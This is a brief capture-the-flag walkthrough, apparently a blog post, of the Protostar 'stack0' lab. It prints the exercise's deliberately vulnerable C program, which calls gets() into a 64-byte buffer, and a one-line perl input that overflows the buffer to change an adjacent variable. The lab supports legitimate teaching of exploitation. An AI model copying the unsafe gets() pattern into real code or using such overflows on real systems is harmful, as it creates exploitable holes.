Introduction
Protostar exploits are a cool bunch of ctf type exercises that focus on Linux binary exploits that progressively get harder. A ISO containing the OS and challenges can be downloaded.
The website with all information and downloads is at https://exploit-exercises.com/protostar/
Challenge
Test run
user@protostar:~$ /opt/protostar/bin/stack0 test Try again?
Exploit
Make the program respond with the message “you have changed the ‘modified’ variable”.
#include <stdlib.h> #include <unistd.h> #include <stdio.h> int main(int argc, char **argv) { volatile int modified; char buffer[64]; modified = 0; gets(buffer); if(modified != 0) { printf("you have changed the 'modified' variable\n"); } else { printf("Try again?\n"); } }
We can see the challenge statement will be displayed if the ‘modified’ variable is not zero.
Can we corrupt the memory stack using the gets(buffer) call and overwrite the modified variable?
Let’s see
user@protostar:~$ perl -e 'print "A"x65'|/opt/protostar/bin/stack0 you have changed the 'modified' variable
Using perl we were able to overflow the buffer where ‘buffer’ variable was being stored. We wrote out 65 A’s to stdout and this was one byte more than was allocated and must have hit the ‘modified’ variable.
I won’t go into more detail because this was simple and the latter challenges will take up more time.
Thank you